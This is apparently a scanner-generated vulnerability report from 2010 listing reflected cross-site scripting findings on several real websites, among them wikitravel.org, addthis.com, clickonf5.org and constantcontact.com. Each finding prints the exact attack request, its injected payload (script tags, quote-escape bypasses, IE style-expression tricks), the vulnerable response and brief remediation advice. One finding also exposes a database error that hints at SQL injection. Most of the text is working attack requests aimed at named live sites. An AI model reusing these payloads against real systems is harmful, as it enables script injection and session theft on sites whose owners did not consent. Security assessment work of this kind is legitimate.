GET /en/Torontoa333edaddd\'%3balert(1)//ec3631b4d56/%27%253Balert(1 HTTP/1.1 Host: wikitravel.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wikitravel_ip=127.0.0.1; __utmz=203351703.1290653470.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/8|utmcmd=referral; BIGipServerwikitravel_pool=2918912172.20480.0000; __utma=203351703.667145852.1290653464.1290653464.1290653464.1; __utmc=203351703; __utmb=203351703;
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 04:00:34 GMT Server: Apache Content-Language: en, en Vary: Accept-Encoding Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67946057 Expires: Mon, 29 Sep 2008 18:06:17 GMT Content-Type: text/html; charset=utf-8 X-Cache: MISS from wikitravel.org X-Cache-Lookup: MISS from wikitravel.org:80 Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf3df\'%3balert(1)//c3178e86793 was submitted in the REST URL parameter 3. This input was echoed as bf3df\\';alert(1)//c3178e86793 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /en/Torontoa333e/%27%253Balert(1bf3df\'%3balert(1)//c3178e86793 HTTP/1.1 Host: wikitravel.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wikitravel_ip=127.0.0.1; __utmz=203351703.1290653470.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/8|utmcmd=referral; BIGipServerwikitravel_pool=2918912172.20480.0000; __utma=203351703.667145852.1290653464.1290653464.1290653464.1; __utmc=203351703; __utmb=203351703;
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 04:00:47 GMT Server: Apache Content-Language: en, en Vary: Accept-Encoding Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67946070 Expires: Mon, 29 Sep 2008 18:06:17 GMT Content-Type: text/html; charset=utf-8 X-Cache: MISS from wikitravel.org X-Cache-Lookup: MISS from wikitravel.org:80 Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 930f3"-alert(1)-"bc36973c37e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php930f3"-alert(1)-"bc36973c37e HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 25 Nov 2010 02:56:09 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=6t3itie1fqtk3vtif5tits57v4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php930f3"-alert(1)-"bc36973c37e"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f704<script>alert(1)</script>a321a7a5847 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php2f704<script>alert(1)</script>a321a7a5847 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 25 Nov 2010 02:56:09 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=qmg1e8sehbasbhf50kdg71euj5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php2f704<script>alert(1)</script>a321a7a5847</strong> ...[SNIP]...
2.147. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dade6"-alert(1)-"c9bfdad426f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/dade6"-alert(1)-"c9bfdad426f HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 02:56:06 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/dade6"-alert(1)-"c9bfdad426f"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.148. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcc69"%20style%3dx%3aexpression(alert(1))%20ecf8a24fcae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bcc69\" style=x:expression(alert(1)) ecf8a24fcae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250&pub=mitconsul/bcc69"%20style%3dx%3aexpression(alert(1))%20ecf8a24fcaeting HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 02:56:28 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88538
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="pub" name="pub" value="mitconsul/bcc69\" style=x:expression(alert(1)) ecf8a24fcaeting" /> ...[SNIP]...
The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7671"%20style%3dx%3aexpression(alert(1))%20f7b03aeb155 was submitted in the pub parameter. This input was echoed as b7671\" style=x:expression(alert(1)) f7b03aeb155 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250&pub=mitconsultingb7671"%20style%3dx%3aexpression(alert(1))%20f7b03aeb155 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 02:56:16 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88530
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="pub" name="pub" value="mitconsultingb7671\" style=x:expression(alert(1)) f7b03aeb155" /> ...[SNIP]...
The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5dd5"style%3d"x%3aexpression(alert(1))"b78b40a2e00 was submitted in the v parameter. This input was echoed as b5dd5"style="x:expression(alert(1))"b78b40a2e00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250b5dd5"style%3d"x%3aexpression(alert(1))"b78b40a2e00&pub=mitconsulting HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 02:56:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="source" name="source" value="bkm-250b5dd5"style="x:expression(alert(1))"b78b40a2e00" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51264"><a>9e90e248a17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /autos/search51264"><a>9e90e248a17/testdrives/ HTTP/1.1 Host: www.autonet.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 805c4<a>b42ac918b8b was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /directory.php?name=Consulting&categoryId=228805c4<a>b42ac918b8b HTTP/1.1 Host: www.calgarykiosk.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 04:52:01 GMT Server: Apache/1.3.41 (Unix) PHP/5.2.8 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.8 Connection: close Content-Type: text/html Content-Length: 1342
mysql error: [1054: Unknown column '228805c4' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 228805c4<a>b42ac918b8b ORDER BY name ASC") <pre align=left> &nb ...[SNIP]...
2.153. http://www.clickonf5.org/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.clickonf5.org
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c912"><script>alert(1)</script>8af7a4bb544 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c912\\\"><script>alert(1)</script>8af7a4bb544 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?4c912"><script>alert(1)</script>8af7a4bb544=1 HTTP/1.1 Host: www.clickonf5.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 04:53:38 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Cookie X-Pingback: http://www.clickonf5.org/xmlrpc.php Cache-Control: max-age=900 Expires: Thu, 25 Nov 2010 05:08:38 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 60255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e ...[SNIP]... <a href="http://www.clickonf5.org/?4c912\\\"><script>alert(1)</script>8af7a4bb544=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10434'%3balert(1)//4c77d1935b5 was submitted in the REST URL parameter 1. This input was echoed as 10434';alert(1)//4c77d1935b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_script10434'%3balert(1)//4c77d1935b5/clickpathmedia.js HTTP/1.1 Host: www.constantcontact.com Proxy-Connection: keep-alive Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000; mbox=check#true#1290653400|session#1290653339802-62786#1290655200
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1729'%3balert(1)//9dca623ddf4 was submitted in the REST URL parameter 1. This input was echoed as f1729';alert(1)//9dca623ddf4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_scriptf1729'%3balert(1)//9dca623ddf4/default/javascript.js?version=1290097629000 HTTP/1.1 Host: www.constantcontact.com Proxy-Connection: keep-alive Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e90f5'%3balert(1)//d4c3ecda18a was submitted in the REST URL parameter 1. This input was echoed as e90f5';alert(1)//d4c3ecda18a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_scripte90f5'%3balert(1)//d4c3ecda18a/excanvas.compiled.js?version=1290097629000 HTTP/1.1 Host: www.constantcontact.com Proxy-Connection: keep-alive Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60f4b'%3balert(1)//08aa0406d3a was submitted in the REST URL parameter 1. This input was echoed as 60f4b';alert(1)//08aa0406d3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_script60f4b'%3balert(1)//08aa0406d3a/footnoteLinks.js?version=1290097629000 HTTP/1.1 Host: www.constantcontact.com Proxy-Connection: keep-alive Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64890'%3balert(1)//fb12ab3a1d4 was submitted in the REST URL parameter 1. This input was echoed as 64890';alert(1)//fb12ab3a1d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_script64890'%3balert(1)//fb12ab3a1d4/includes/js/mbox.js?version=1290097629000 HTTP/1.1 Host: www.constantcontact.com Proxy-Connection: keep-alive Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c982e'%3balert(1)//472c31e3bd4 was submitted in the REST URL parameter 1. This input was echoed as c982e';alert(1)//472c31e3bd4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_scriptc982e'%3balert(1)//472c31e3bd4/jquery/jquery-1.3.2.js?version=1290097629000 HTTP/1.1 Host: www.constantcontact.com Proxy-Connection: keep-alive Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bddc7'%3balert(1)//e2bc50926ef was submitted in the REST URL parameter 1. This input was echoed as bddc7';alert(1)//e2bc50926ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_scriptbddc7'%3balert(1)//e2bc50926ef/s_code.js HTTP/1.1 Host: www.constantcontact.com Proxy-Connection: keep-alive Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000; mbox=check#true#1290653400|session#1290653339802-62786#1290655200
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dec78'%3balert(1)//77bd47f412a was submitted in the REST URL parameter 1. This input was echoed as dec78';alert(1)//77bd47f412a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_scriptdec78'%3balert(1)//77bd47f412a/social-media-toolbar.js?version=1290097629000 HTTP/1.1 Host: www.constantcontact.com Proxy-Connection: keep-alive Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 887ec'%3balert(1)//a5ecba090b6 was submitted in the REST URL parameter 1. This input was echoed as 887ec';alert(1)//a5ecba090b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c69ee'%3balert(1)//d212da10a1c was submitted in the REST URL parameter 2. This input was echoed as c69ee';alert(1)//d212da10a1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9855a'%3balert(1)//c59f81f41b4 was submitted in the REST URL parameter 1. This input was echoed as 9855a';alert(1)//c59f81f41b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
